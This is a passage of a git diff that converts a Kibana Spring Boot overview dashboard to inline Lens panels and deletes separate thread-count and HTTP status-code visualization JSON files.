"seriesType": "bar", + "showGridlines": false, + "splitAccessor": "21757728-2591-42a8-bed5-10cc5c097d85", + "xAccessor": "2dbf54bf-2147-4302-902b-a176ae9df338" + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false, + "verticalAlignment": "top", + "legendSize": "auto" }, - "panelIndex": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", - "panelRefName": "panel_1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 14, - "i": "7549bdf0-d5de-4851-9e9f-867a65684052", - "w": 17, - "x": 31, - "y": 29 + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "7549bdf0-d5de-4851-9e9f-867a65684052", - "panelRefName": "panel_7549bdf0-d5de-4851-9e9f-867a65684052", - "title": "HTTP Request method types [Logs Spring Boot]", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Spring Boot] Overview Dashboard", - "version": 1 - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746", - "migrationVersion": { - "dashboard": "8.2.0" - }, - "references": [ - { - "id": "spring_boot-aefe6620-ca13-11ec-b4b1-b57f75afa7dd", - "name": "b55e357e-4c45-430c-ae63-2c6facaabc2e:panel_b55e357e-4c45-430c-ae63-2c6facaabc2e", - "type": "lens" - }, - { - "id": "logs-*", - "name": "8da90917-936b-49b2-a845-24db7da4681e:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "8da90917-936b-49b2-a845-24db7da4681e:indexpattern-datasource-layer-25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "8da90917-936b-49b2-a845-24db7da4681e:197542f3-0a77-4046-a21d-9e87d097f9d9", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "8da90917-936b-49b2-a845-24db7da4681e:5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", - "type": "index-pattern" - }, - { - "id": "spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00", - "name": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb:panel_3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", - "type": "lens" - }, - { - "id": "logs-*", - "name": "44a2b9a5-626c-426b-8bbb-921b56040444:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "44a2b9a5-626c-426b-8bbb-921b56040444:indexpattern-datasource-layer-a41a8eed-69fe-4838-b8f5-b322f7661832", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "44a2b9a5-626c-426b-8bbb-921b56040444:fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "44a2b9a5-626c-426b-8bbb-921b56040444:0e57fdc9-82ca-45c5-bdfa-57704436ea9a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:indexpattern-datasource-layer-3e8e41c2-e9bd-4bf7-9e82-d478063ca973", - "type": "index-pattern" + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "HTTP Request status code [Logs Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ba5b5f52-398a-48c9-8021-520aa78ccdba", + "type": "index-pattern" + } + ] + } }, - { - "id": "metrics-*", - "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", - "type": "index-pattern" + "gridData": { + "h": 11, + "i": "16610775-6aaa-4759-a3eb-a67c55f5d780", + "w": 28, + "x": 20, + "y": 18 }, - { - "id": "metrics-*", - "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:0a93fba6-6f3f-4f2c-a19e-ead075b97111", - "type": "index-pattern" + "panelIndex": "16610775-6aaa-4759-a3eb-a67c55f5d780", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "41dbf555-e40a-45dc-83d7-18b18263e8de": { + "columnOrder": [ + "3624c7a7-411d-4138-9fdf-8b8a0694d285", + "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "a84b9b2d-8712-4975-a242-7996161a71da", + "5209c821-5ae2-40d6-b2c5-321b76c96ebc", + "52932019-4385-469b-9f4d-6becd3a912f6", + "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081" + ], + "columns": { + "3624c7a7-411d-4138-9fdf-8b8a0694d285": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100 values of spring_boot.audit_events.document_id", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 100 + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.document_id" + }, + "5209c821-5ae2-40d6-b2c5-321b76c96ebc": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Host", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.data.remote_address" + }, + "52932019-4385-469b-9f4d-6becd3a912f6": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Session ID", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.data.session_id" + }, + "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Authentication type", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.type" + }, + "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": false, + "interval": "1s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "a84b9b2d-8712-4975-a242-7996161a71da": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Principal", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.principal" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.audit_events" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.audit_events" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "a84b9b2d-8712-4975-a242-7996161a71da", + "hidden": false, + "isTransposed": false, + "width": 166 + }, + { + "alignment": "center", + "columnId": "5209c821-5ae2-40d6-b2c5-321b76c96ebc", + "isTransposed": false, + "width": 183.41666666666669 + }, + { + "alignment": "center", + "columnId": "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081", + "isTransposed": false, + "width": 296.41666666666674 + }, + { + "alignment": "center", + "columnId": "3624c7a7-411d-4138-9fdf-8b8a0694d285", + "hidden": true, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "isTransposed": false, + "width": 128.16666666666652 + }, + { + "alignment": "center", + "columnId": "52932019-4385-469b-9f4d-6becd3a912f6", + "isTransposed": false + } + ], + "fitRowToContent": true, + "layerId": "41dbf555-e40a-45dc-83d7-18b18263e8de", + "layerType": "data", + "paging": { + "enabled": true, + "size": 10 + }, + "rowHeight": "auto", + "rowHeightLines": 2, + "sorting": { + "columnId": "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "direction": "desc" + } + } + }, + "title": "Audit Events [Logs Spring Boot]", + "visualizationType": "lnsDatatable", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-41dbf555-e40a-45dc-83d7-18b18263e8de", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd", - "name": "47822937-f8de-43cd-8000-b0c08d933804:panel_47822937-f8de-43cd-8000-b0c08d933804", - "type": "lens" + "gridData": { + "h": 14, + "i": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", + "w": 31, + "x": 0, + "y": 29 }, - { - "id": "spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd", - "name": "16610775-6aaa-4759-a3eb-a67c55f5d780:panel_16610775-6aaa-4759-a3eb-a67c55f5d780", - "type": "lens" + "panelIndex": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { + "columnOrder": [ + "59a904ae-9fcd-4d06-b201-09117b1981d6", + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "columns": { + "59a904ae-9fcd-4d06-b201-09117b1981d6": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of http.request.method", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "9a043bf0-329d-4632-a095-86760550bd75", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + }, + "9a043bf0-329d-4632-a095-86760550bd75": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "76ee3705-3872-45f3-8cbf-f0595d97905d", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "layerType": "data", + "legendDisplay": "show", + "nestedLegend": true, + "numberDisplay": "percent", + "legendSize": "auto", + "primaryGroups": [ + "59a904ae-9fcd-4d06-b201-09117b1981d6" + ], + "metrics": [ + "9a043bf0-329d-4632-a095-86760550bd75" + ] + } + ], + "shape": "pie" + } + }, + "title": "HTTP Request method types [Metrics Spring Boot]", + "visualizationType": "lnsPie", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "76ee3705-3872-45f3-8cbf-f0595d97905d", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00", - "name": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29:panel_1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", - "type": "lens" + "gridData": { + "h": 14, + "i": "7549bdf0-d5de-4851-9e9f-867a65684052", + "w": 17, + "x": 31, + "y": 29 }, - { - "id": "spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd", - "name": "7549bdf0-d5de-4851-9e9f-867a65684052:panel_7549bdf0-d5de-4851-9e9f-867a65684052", - "type": "lens" - } + "panelIndex": "7549bdf0-d5de-4851-9e9f-867a65684052", + "title": "HTTP Request method types [Logs Spring Boot]", + "type": "lens", + "version": "8.6.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Spring Boot] Overview Dashboard", + "version": 1 + }, + "references": [ + { + "id": "logs-*", + "name": "8da90917-936b-49b2-a845-24db7da4681e:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8da90917-936b-49b2-a845-24db7da4681e:indexpattern-datasource-layer-25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8da90917-936b-49b2-a845-24db7da4681e:197542f3-0a77-4046-a21d-9e87d097f9d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8da90917-936b-49b2-a845-24db7da4681e:5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "44a2b9a5-626c-426b-8bbb-921b56040444:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "44a2b9a5-626c-426b-8bbb-921b56040444:indexpattern-datasource-layer-a41a8eed-69fe-4838-b8f5-b322f7661832", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "44a2b9a5-626c-426b-8bbb-921b56040444:fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "44a2b9a5-626c-426b-8bbb-921b56040444:0e57fdc9-82ca-45c5-bdfa-57704436ea9a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:indexpattern-datasource-layer-3e8e41c2-e9bd-4bf7-9e82-d478063ca973", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:0a93fba6-6f3f-4f2c-a19e-ead075b97111", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "b55e357e-4c45-430c-ae63-2c6facaabc2e:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "b55e357e-4c45-430c-ae63-2c6facaabc2e:indexpattern-datasource-layer-786d6832-6c69-42e4-916f-df6df259fad1", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb:indexpattern-datasource-layer-73272b0b-e1d4-4a44-9904-adaad0d24159", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb:b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "47822937-f8de-43cd-8000-b0c08d933804:indexpattern-datasource-layer-31ad067d-6820-43dc-a6fd-7a32a6a121f5", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "47822937-f8de-43cd-8000-b0c08d933804:8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "16610775-6aaa-4759-a3eb-a67c55f5d780:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "16610775-6aaa-4759-a3eb-a67c55f5d780:indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "16610775-6aaa-4759-a3eb-a67c55f5d780:ba5b5f52-398a-48c9-8021-520aa78ccdba", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29:indexpattern-datasource-layer-41dbf555-e40a-45dc-83d7-18b18263e8de", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29:96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "7549bdf0-d5de-4851-9e9f-867a65684052:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "7549bdf0-d5de-4851-9e9f-867a65684052:indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "7549bdf0-d5de-4851-9e9f-867a65684052:76ee3705-3872-45f3-8cbf-f0595d97905d", + "id": "logs-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-0f481600-ca11-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-0f481600-ca11-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index 55096d79b96..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-0f481600-ca11-11ec-b4b1-b57f75afa7dd.json +++ /dev/null @@ -1,135 +0,0 @@ -{ - "attributes": { - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { - "columnOrder": [ - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", - "522f8dd4-2bc7-4665-9b33-83609e4f3125" - ], - "columns": { - "522f8dd4-2bc7-4665-9b33-83609e4f3125": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Current Threads", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "spring_boot.threading.threads.count" - }, - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6502fda4-d554-4b5d-8e8b-e6d3c873901b", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.threading" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.threading" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "accessors": [ - "522f8dd4-2bc7-4665-9b33-83609e4f3125" - ], - "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Current Threads" - } - }, - "title": "Current threads [Metrics Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-11-02T08:40:25.266Z", - "id": "spring_boot-0f481600-ca11-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6502fda4-d554-4b5d-8e8b-e6d3c873901b", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-12228630-ca11-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-12228630-ca11-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index 15bd8116ca2..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-12228630-ca11-11ec-b4b1-b57f75afa7dd.json +++ /dev/null @@ -1,135 +0,0 @@ -{ - "attributes": { - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { - "columnOrder": [ - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", - "c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c" - ], - "columns": { - "c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Daemon Threads", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "spring_boot.threading.threads.daemon" - }, - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "702499ca-434e-41d4-b9a1-1d0bb27b244a", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.threading" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.threading" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "accessors": [ - "c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c" - ], - "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Daemon Threads" - } - }, - "title": "Daemon threads [Metrics Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-11-02T08:40:41.413Z", - "id": "spring_boot-12228630-ca11-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "702499ca-434e-41d4-b9a1-1d0bb27b244a", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-4a05b120-c9ea-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-4a05b120-c9ea-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index bf7569e3746..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-4a05b120-c9ea-11ec-b4b1-b57f75afa7dd.json +++ /dev/null @@ -1,142 +0,0 @@ -{ - "attributes": { - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { - "columnOrder": [ - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", - "bd774bf7-35bf-4dd7-a647-897d8b5945df" - ], - "columns": { - "bd774bf7-35bf-4dd7-a647-897d8b5945df": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Threads", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "spring_boot.threading.threads.started" - }, - "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "61418bc6-4106-4f91-81ea-1e1071b7c9bb", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.threading" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.threading" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "accessors": [ - "bd774bf7-35bf-4dd7-a647-897d8b5945df" - ], - "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" - } - ], - "legend": { - "isInside": false, - "isVisible": true, - "legendSize": "auto", - "maxLines": 1, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Total Threads" - } - }, - "title": "Threads [Metrics Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-11-02T08:40:08.989Z", - "id": "spring_boot-4a05b120-c9ea-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "61418bc6-4106-4f91-81ea-1e1071b7c9bb", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index 16f3c421f12..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd.json +++ /dev/null @@ -1,169 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { - "columnOrder": [ - "2dbf54bf-2147-4302-902b-a176ae9df338", - "21757728-2591-42a8-bed5-10cc5c097d85", - "9a043bf0-329d-4632-a095-86760550bd75" - ], - "columns": { - "21757728-2591-42a8-bed5-10cc5c097d85": { - "dataType": "number", - "isBucketed": true, - "label": "http.response.status_code", - "operationType": "range", - "params": { - "maxBars": "auto", - "ranges": [ - { - "from": 0, - "label": "", - "to": 1000 - } - ], - "type": "histogram" - }, - "scale": "interval", - "sourceField": "http.response.status_code" - }, - "2dbf54bf-2147-4302-902b-a176ae9df338": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "1m" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "9a043bf0-329d-4632-a095-86760550bd75": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "scale": "ratio", - "sourceField": "___records___" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "ba5b5f52-398a-48c9-8021-520aa78ccdba", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.http_trace" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.http_trace" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - 